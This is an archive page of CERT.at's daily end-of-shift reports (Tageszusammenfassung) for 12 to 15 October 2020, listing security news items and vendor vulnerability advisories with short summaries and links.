===================== = End-of-Day report = ===================== Timeframe: Mittwoch 14-10-2020 18:00 − Donnerstag 15-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Bleedingtooth: Google und Intel warnen vor neuen Bluetooth-Lücken ∗∗∗ --------------------------------------------- Laut Google lässt sich über die Sicherheitslücken Code aus der Ferne ausführen. Intel hat sie veröffentlicht, bevor Patches ausgeliefert wurden. --------------------------------------------- https://www.golem.de/news/bleedingtooth-google-und-intel-warnen-vor-neuen-b… ∗∗∗ Security Analysis of CHERI ISA ∗∗∗ --------------------------------------------- Is it possible to get to a state where memory safety issues would be deterministically mitigated? Our quest to mitigate memory corruption vulnerabilities led us to examine CHERI (Capability Hardware Enhanced RISC Instructions), which provides memory protection features against many exploited vulnerabilities, or in other words, an architectural solution that breaks exploits. --------------------------------------------- https://msrc-blog.microsoft.com:443/2020/10/14/security-analysis-of-cheri-i… ∗∗∗ Magento Phishing Leverages JavaScript For Exfiltration ∗∗∗ --------------------------------------------- During a recent investigation, a Magento admin login phishing page was found on a compromised website using the file name wp-order.php. This is an odd file name choice for a Magento phishing page, but nevertheless it successfully loads a legitimate looking Magento 1.x login page. --------------------------------------------- https://blog.sucuri.net/2020/10/magento-phishing-leverages-javascript-for-e… ∗∗∗ [SANS ISC] Nicely Obfuscated Python RAT ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Nicely Obfuscated Python RAT“: While hunting, I found an interesting Python script. It matched one of my YARA rules due to the interesting list of imports but the content itself was nicely obfuscated. --------------------------------------------- https://blog.rootshell.be/2020/10/15/sans-isc-nicely-obfuscated-python-rat/ ∗∗∗ Dockerfile Security Best Practices ∗∗∗ --------------------------------------------- Container security is a broad problem space and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some rules when writing Dockerfiles. --------------------------------------------- https://cloudberry.engineering/article/dockerfile-security-best-practices/ ∗∗∗ QR code scams are making a comeback ∗∗∗ --------------------------------------------- With QR codes being used more as a means to help create a COVID-19 proof environment, were also seeing a comeback of QR codes scams. --------------------------------------------- https://blog.malwarebytes.com/scams/2020/10/qr-code-scams-are-making-a-come… ∗∗∗ This major criminal hacking group just switched to ransomware attacks ∗∗∗ --------------------------------------------- A newly detailed financial cybercrime group has been conducting attacks around the world since 2016 - but now theyve switched to ransomware because its the biggest and easiest pay day. --------------------------------------------- https://www.zdnet.com/article/this-major-criminal-hacking-group-just-switch… ∗∗∗ New Emotet attacks use fake Windows Update lures ∗∗∗ --------------------------------------------- Emotet diversifies arsenal with new lures to trick users into infecting themselves. --------------------------------------------- https://www.zdnet.com/article/new-emotet-attacks-use-fake-windows-update-lu… ===================== = Vulnerabilities = ===================== ∗∗∗ Drupal OAuth Server ( OAuth Provider) - Single Sign On ( SSO ) - Moderately critical - SQL Injection - SA-CONTRIB-2020-034 ∗∗∗ --------------------------------------------- Project: Drupal OAuth Server ( OAuth Provider) - Single Sign On ( SSO ) Date: 2020-October-14 Security risk: Moderately critical 12∕25 AC:Basic/A:None/CI:None/II:Some/E:Theoretical/TD:Default Vulnerability: SQL Injection Description: This module enables you login into any OAuth 2.0 compliant application using Drupal credentials. The 8.x branch of the module is vulnerable to SQL injection. Solution: Install the latest version: If you use the Drupal OAuth Server module for Drupal 8.x, upgrade to 8.x-1.1 --------------------------------------------- https://www.drupal.org/sa-contrib-2020-034 ∗∗∗ Juniper Security Bulletins 2020-10 ∗∗∗ --------------------------------------------- JSA11045 - 2020-10 Security Bulletin: JSA Series: Intel CPUs could allow a local authenticated attacker to obtain sensitive information (CVE-2019-11135) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11045 JSA11046 - 2020-10 Security Bulletin: Junos OS: FreeBSD-SA-20:03.thrmisc: kernel stack data disclosure (CVE-2019-15875) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11046 JSA11047 - 2020-10 Security Bulletin: FreeBSD-SA-19:20.bsnmp : Insufficient message length validation in bsnmp library (CVE-2019-5610) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11047 JSA11048 - 2020-10 Security Bulletin: Junos Space and Junos Space Security Director: Zombie POODLE and GOLDENDOODLE resolved in 20.2R1 release https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11048 JSA11049 - 2020-10 Security Bulletin: Junos OS: When a DHCPv6 Relay-Agent is configured upon receipt of a specific DHCPv6 client message, Remote Code Execution may occur. (CVE-2020-1656) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11049 JSA11050 - 2020-10 Security Bulletin: Junos OS: SRX Series: An attacker sending spoofed packets to IPSec peers may cause a Denial of Service. (CVE-2020-1657) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11050 JSA11053 - 2020-10 Security Bulletin: Junos OS: NFX Series: Multiple vulnerabilities resolved in 20.2R1 release https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11053 JSA11054 - 2020-10 Security Bulletin: Junos OS: MX Series: Receipt of specific packets can cause services card to restart when DNS filtering is configured. (CVE-2020-1660) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11054 JSA11055 - 2020-10 Security Bulletin: Junos OS: Multiple SQLite vulnerabilities resolved. https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11055 JSA11056 - 2020-10 Security Bulletin: Junos OS: jdhcpd process crash when forwarding a malformed DHCP packet. (CVE-2020-1661) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11056 JSA11062 - 2020-10 Security Bulletin: Junos OS: MX series/EX9200 Series: IPv6 DDoS protection does not work as expected. (CVE-2020-1665) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11062 JSA11076 - 2020-10 Security Bulletin: Junos OS: PTX/QFX Series: Kernel Routing Table (KRT) queue stuck after packet sampling a malformed packet when the tunnel-observation mpls-over-udp configuration is enabled. (CVE-2020-1679) https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11076 JSA11079 - 2020-10 Security Bulletin: Junos OS: SRX1500, vSRX, SRX4K, NFX150: Denial of service vulnerability executing local CLI command (CVE-2020-1682) --------------------------------------------- https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11079 ∗∗∗ Red Hat JBoss Enterprise Application Platform: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0992 ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Netcool Agile Service Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in Hibernate Validator affects WebSphere Application Server Liberty (CVE-2020-10693) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-hibernat… ∗∗∗ Security Bulletin: Netcool Operations Insight component IBM Network Performance Insight 1.3.1 affected by CVE-2020-14195 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition affect IBM Operational Decision Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Security Vulnerabilities in IBM WebSphere Liberty fixed in IBM Security Access Manager Appliance ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Netcool Operations Insight component IBM Network Performance Insight 1.3.1 affected by CVE-2020-14062 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh… ∗∗∗ Security Bulletin: Security Vulnerabilities have been identified in IBM Java Runtime as shipped with Tivoli Federated Identity Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache… ∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by an Apache Commons Codec vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh… ∗∗∗ Security Bulletin: Security vulnerabilities have been fixed in the IBM Security Access Manager and IBM Security Verify Access products ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.10.2020
by Daily end-of-shift report 14 Oct '20

14 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 13-10-2020 18:00 − Mittwoch 14-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Patchday: Aktuelle Updates von Microsoft beugen Angriffen aus der Ferne vor ∗∗∗ --------------------------------------------- Aktive Angriffe auf die zum Patch Tuesday beseitigten, teils kritischen Sicherheitslücken wurden bislang nicht beobachtet. Zügig updaten sollte man dennoch. --------------------------------------------- https://heise.de/-4928145 ∗∗∗ Apples Sicherheitschip T2: Exploit in Aktion gezeigt ∗∗∗ --------------------------------------------- Ein Hackerteam hat demonstriert, wie sich der aktuelle Sicherheitschip im Mac knacken lässt – mit einem simplen manipulierten USB-C-Kabel. --------------------------------------------- https://heise.de/-4928042 ∗∗∗ Vorsicht vor Phishing-Anrufen im Namen von Magenta ∗∗∗ --------------------------------------------- Immer häufiger nutzen Kriminelle das Telefon, um an persönliche Daten zu kommen. Derzeit geben sich BetrügerInnen als Magenta aus und versuchen per Anruf an das Kundenpasswort der Opfer und weitere persönliche Daten zu gelangen. Heben Sie daher bei Anrufen von der Telefonnummer 0800799742 nicht ab! --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-phishing-anrufen-im-nam… ===================== = Vulnerabilities = ===================== ∗∗∗ For Foxits sake: Windows and Mac users alike urged to patch PhantomPDF over use-after-free vulns ∗∗∗ --------------------------------------------- CISA points spotlight at PDF reader n creator suite Windows and Mac users running Foxits popular PhantomPDF reader should update their installations to the latest version after the US CISA cybersecurity agency warned of a handful of high-severity product vulnerabilities. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2020/10/13/foxit_phanto… ∗∗∗ October 2020 Patch Tuesday: Microsoft fixes potentially wormable Windows TCP/IP RCE flaw ∗∗∗ --------------------------------------------- On this October 2020 Patch Tuesday: Microsoft has plugged 87 security holes, including critical ones in the Windows TCP/IP stack and Microsoft Outlook and Microsoft 365 Apps for Enterprise Adobe has delivered security updates for Adobe Flash Player Intel warns about flaws in BlueZ, the official Linux Bluetooth protocol stack SAP has released 15 security notes and updates to 6 previously released ones. --------------------------------------------- https://www.helpnetsecurity.com/2020/10/13/october-2020-patch-tuesday/ ∗∗∗ SAP-Patchday: Lücke mit Höchstwertung in CA Introscope Enterprise Manager gefixt ∗∗∗ --------------------------------------------- SAP-Admins sollten die verfügbaren Sicherheitsupdates zeitnah unter die Lupe nehmen und wo nötig einspielen. Die Risikoeinstufung "High" ist mehrfach vertreten. --------------------------------------------- https://heise.de/-4928265 ∗∗∗ Vulnerability Spotlight: Information leak vulnerability in Google Chrome WebGL ∗∗∗ --------------------------------------------- Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw. The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to carry out a range of malicious actions. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in WebGL, which is a Chrome API responsible for displaying 3-D graphics. --------------------------------------------- https://blog.talosintelligence.com/2020/10/vuln-spotlight-chrome-web-gl-inf… ∗∗∗ SonicWall VPN Portal Critical Flaw (CVE-2020-5135) ∗∗∗ --------------------------------------------- Tripwire VERT has identified a stack-based buffer overflow in SonicWall Network Security Appliance (NSA). The flaw can be triggered by an unauthenticated HTTP request involving a custom protocol handler. The vulnerability exists within the HTTP/HTTPS service used for product management as well as SSL VPN remote access. --------------------------------------------- https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critic… ∗∗∗ Kubernetes AWS IAM Integration Issues ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020100083 ∗∗∗ Red Hat JBoss Enterprise Application Platform: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0975 ∗∗∗ Trend Micro AntiVirus for Mac: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0977 ∗∗∗ Security Advisory - Denial of Service Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-… ∗∗∗ Security Advisory - Buffer Overflow Vulnerability in the Bluetooth Module of Some Huawei Mobile Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-… ∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei Smartphones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-… ∗∗∗ Security Advisory - JavaScript Injection Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a jackson-databind vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Apache Derby as used by IBM QRadar SIEM is vulnerable to Improper Input Validation (CVE-2018-1313) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-derby-as-used-by-i… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Security Vulnerabilities have been fixed in IBM Security Access Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Unzip as used by IBM QRadar SIEM is vulnerable to denial of service (CVE-2019-13232) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-unzip-as-used-by-ibm-qrad… ∗∗∗ Security Bulletin: IBM MQ Appliance is affected by an information disclosure vulnerability (CVE-2020-4528) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.10.2020
by Daily end-of-shift report 13 Oct '20

13 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Montag 12-10-2020 18:00 − Dienstag 13-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Windows Update can be abused to execute malicious programs ∗∗∗ --------------------------------------------- The Windows Update client has just been added to the list of living-off-the-land binaries (LoLBins) attackers can use to execute malicious code on Windows systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/windows-update-can-be-abused… ∗∗∗ Angreifer auf US-Regierungsnetzwerke kombinieren "Zerologon" mit weiteren Lücken ∗∗∗ --------------------------------------------- Sicherheitslücken in FortiOS und MobileIron Core & Connector werden mit Zerologon zu einer Exploit-Chain verwoben, warnen CISA und FBI. --------------------------------------------- https://heise.de/-4927692 ∗∗∗ 55 Sicherheitslücken bei Apple‑Diensten entdeckt ∗∗∗ --------------------------------------------- Fünf Hacker haben in einem Zeitraum von nur 3 Monaten fast 300.000 US-Dollar an Bug-Bounty-Belohnungen erhalten --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/10/13/55-sicherheitsluecken-bei… ∗∗∗ Anatomy of Ryuk Attack: 29 Hours From Initial Email to Full Compromise ∗∗∗ --------------------------------------------- An attack involving the Ryuk ransomware required 29 hours from an email being sent to the target to full environment compromise and the encryption of systems, according to the DFIR Report, a project that provides threat intelligence from real attacks observed by its honeypots. --------------------------------------------- https://www.securityweek.com/anatomy-ryuk-attack-29-hours-initial-email-ful… ∗∗∗ Study Finds 400,000 Vulnerabilities Across 2,200 Virtual Appliances ∗∗∗ --------------------------------------------- Virtual appliances, even if they are provided by major software or cybersecurity vendors, can pose a serious risk to organizations, according to a report published on Tuesday by cloud visibility firm Orca Security. --------------------------------------------- https://www.securityweek.com/study-finds-400000-vulnerabilities-across-2200… ∗∗∗ Diese Scamming-Maschen sollten Sie kennen ∗∗∗ --------------------------------------------- Scamming, ein Sammelbegriff für zahlreiche Betrugsmaschen. Aber was ist Scamming? Mit Sicherheit kamen auch Sie bereits mit dieser Betrugsmasche in Berührung oder haben zumindest bereits davon gehört! Hier erfahren Sie mehr über die gängigsten Vorschussbetrugsmaschen und wie Sie sich davor schützen! --------------------------------------------- https://www.watchlist-internet.at/news/diese-scamming-maschen-sollten-sie-k… ∗∗∗ Red Team deckt IAM-Schwächen auf ∗∗∗ --------------------------------------------- Ein Red Team von Palo Alto Networks hat aufgezeigt, wie Angreifer gezielt Lücken und Fehlkonfigurationen im Identity und Access Management (IAM) in der Cloud ausnutzen, um an kritische Informationen zu gelangen. --------------------------------------------- https://www.zdnet.de/88388335/red-team-deckt-iam-schwaechen-auf/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security Updates Available for Adobe Flash Player (APSB20-58) ∗∗∗ --------------------------------------------- Adobe has released security updates for Adobe Flash Player (APSB20-58) for Windows, macOS, Linux and Chrome OS. These updates address a vulnerability rated Critical in Adobe Flash Player. Successful exploitation could lead to an exploitable crash, potentially resulting in arbitrary code execution in the context of the current user. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1925 ∗∗∗ SSA-384879 (Last Update: 2020-10-13): Authentication Bypass Vulnerability in SIPORT MP ∗∗∗ --------------------------------------------- SIPORT MP version 3.2.1 fixes an authentication bypass vulnerability which could enable an attacker to impersonate other users of the system and perform administrative actions. Siemens recommends to apply the update. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-384879.txt ∗∗∗ SSA-226339 (Last Update: 2020-10-13): Multiple Web Application Vulnerabilities in Desigo Insight ∗∗∗ --------------------------------------------- The latest hotfix for Desigo Insight fixes three vulnerabilities that have been identified in the web server, including SQL injection (CVE-2020-15792), clickjacking (CVE-2020-15793), and full path disclosure (CVE-2020-15794). Siemens recommends updating to the latest version of Desigo Insight and to apply the hotfix. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-226339.txt ∗∗∗ Acronis Patches Privilege Escalation Flaws in Backup, Security Solutions ∗∗∗ --------------------------------------------- Acronis has released patches for its True Image, Cyber Backup, and Cyber Protect products to address vulnerabilities that could lead to elevation of privileges. The flaws could allow unprivileged Windows users to run code with SYSTEM privileges, a vulnerability note from the CERT Coordination Center (CERT/CC) reveals. --------------------------------------------- https://www.securityweek.com/acronis-patches-privilege-escalation-flaws-bac… ∗∗∗ SAP Patchday Oktober 2020 ∗∗∗ --------------------------------------------- Ein entfernter, authentisierter oder anonymer Angreifer kann mehrere Schwachstellen in SAP Produkten und Anwendungskomponenten ausnutzen, um die Vertraulichkeit, Verfügbarkeit und die Integrität der Anwendungen zu gefährden. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0972 ∗∗∗ Citrix Gateway Plug-in for Windows Security Update ∗∗∗ --------------------------------------------- Vulnerabilities have been identified in Citrix Gateway Plug-in for Windows that, if exploited, could result in a local user escalating their privilege level to SYSTEM. --------------------------------------------- https://support.citrix.com/article/CTX282684 ∗∗∗ IPAS: Security Advisories for October 2020 ∗∗∗ --------------------------------------------- Hi everyone, For October 2020, we are releasing just one security advisory addressing two vulnerabilities in the BlueZ open-source Bluetooth stack. Affected Linux users are encouraged to update to Linux kernel version 5.9 or later. More information can be found in INTEL-SA-00435 and at www.bluez.org. --------------------------------------------- https://blogs.intel.com/technology/2020/10/ipas-security-advisories-for-oct… ∗∗∗ Remote Desktop Services Remote Code Execution Vulnerability in Rexroth Industrial PCs ∗∗∗ --------------------------------------------- BOSCH-SA-856281: Microsoft has published information [1] for several versions of Microsoft Windows XP Microsoft Windows XP embedded Microsoft Windows 7 and Microsoft Windows 7 Embedded Standard regarding a vulnerability in the Remote Desktop Service. The vulnerability could allow an unauthenticated remote attacker to execute arbitrary code on the target system if the system exposes the service to the network. Rexroth Industrial PCs on these operating systems are affected by this vulnerability. --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-856281.html ∗∗∗ Webmin: Schwachstellen ermöglichen Cross-Site Scripting ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0973 ∗∗∗ BSRT-2020-003 Vulnerability in UEM Core Impacts BlackBerry UEM ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Security Bulletin: Cross-Site Scripting vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4557 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affecting Rational Functional Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Cross Site Scripting vulnerabilities in jQuery might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-7656, CVE-2020-11022, CVE-2020-11023 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affecting Rational Functional Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Vulnerability in Docker affects Cloud Pak Sytem (CVE-2020-13401) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-docker-a… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Qemu affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.10.2020
by Daily end-of-shift report 12 Oct '20

12 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 09-10-2020 18:00 − Montag 12-10-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Sophisticated Android Ransomware Executes with the Home Button ∗∗∗ --------------------------------------------- The malware also has a unique machine-learning module. --------------------------------------------- https://threatpost.com/android-ransomware-home-button/160001/ ∗∗∗ Open Packaging Conventions, (Sat, Oct 10th) ∗∗∗ --------------------------------------------- Office files like .docx, .xlsm, ... are Office Open XML (OOXML) files: a ZIP container containing XML files and possibly other file types. --------------------------------------------- https://isc.sans.edu/diary/rss/26662 ∗∗∗ Operation TrickBot – ein globaler Schlag gegen das Botnetz ∗∗∗ --------------------------------------------- ESET Forscher unterstützten den erfolgreichen Schlag gegen eines der größten Botnetze und Schadcode-Verbreiter. --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/10/12/operation-trickbot-eset-i… ∗∗∗ Deepfake Voice Technology Iterates on Old Phishing Strategies ∗∗∗ --------------------------------------------- As the world of AI and deepfake technology grows more complex, the risk that deepfakes pose to firms and individuals grows increasingly potent. This growing sophistication of the latest software and algorithms has allowed malicious hackers, scammers and cyber criminals who work tirelessly behind the scenes to stay one step ahead of the authorities, making [...] --------------------------------------------- https://www.tripwire.com/state-of-security/featured/deepfake-voice-technolo… ∗∗∗ Vorsicht vor dem Fake-Shop sport-monkey.de! ∗∗∗ --------------------------------------------- Über das Wochenende erreichten die Watchlist Internet unzählige Meldungen zu dem Online-Shop sport-monkey.de. Dieser bietet ein breites Sortiment an Sportausrüstung zu schier unglaublichen Preisen an. Die Preise sind aus einem einzigen Grund so niedrig: Es handelt sich um einen Fake-Shop, der trotz Zahlung per Vorkasse keine Waren liefert. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-dem-fake-shop-sport-mon… ∗∗∗ Event Report - A convenient mechanism to edit, visualize and share reports ∗∗∗ --------------------------------------------- MISP is widely known as a powerful tool to gather, correlate and share information. As a response to the growing information-sharing maturity of the community, more features have been introduced over the past few years to meet analyst skills and requirements. --------------------------------------------- https://www.misp-project.org/2020/10/08/Event-Reports.html ∗∗∗ Hacker nutzen Bugs in VPN und Windows Netlogon ∗∗∗ --------------------------------------------- Angreifer verschaffen sich Zugang zu Behördennetzwerken, indem sie gezielt Schwachstellen in VPN-Systemen und Windows Netlogon ausnutzen. --------------------------------------------- https://www.zdnet.de/88383319/hacker-nutzen-bugs-in-vpn-und-windows-netlogo… ===================== = Vulnerabilities = ===================== ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- A previous version of this bulletin had links to hotfixes that addressed the security issues but caused stability issues for some deployments that were using the Hypervisor Introspection (HVI) functionality of Citrix Hypervisor. Customers who are not using HVI functionality and who have already applied the earlier updates need take no further action. --------------------------------------------- https://support.citrix.com/article/CTX282314 ∗∗∗ Atlassian Jira Software: Schwachstelle ermöglicht Cross-Site Scripting ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0970 ∗∗∗ phpMyAdmin: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0969 ∗∗∗ Reflected Cross-Site Scripting and Unauthenticated Malicious File Upload in Sage DPW ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/reflected-cross-site-scripting… ∗∗∗ Security Bulletin: IBM InfoSphere Information Server is vulnerable to HTML injection. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-informatio… ∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to deserialization of untrusted data ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulner… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4386) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an SQLite vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to buffer overflow leading to a privileged escalation (CVE-2020-4363) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure and denial of service (CVE-2020-4414) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4387) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a denial of service attack (CVE-2020-4420) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Security vulnerabilities have been identified in IBM DB2 shipped with IBM License Metric Tool v9. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.10.2020
by Daily end-of-shift report 09 Oct '20

09 Oct '20

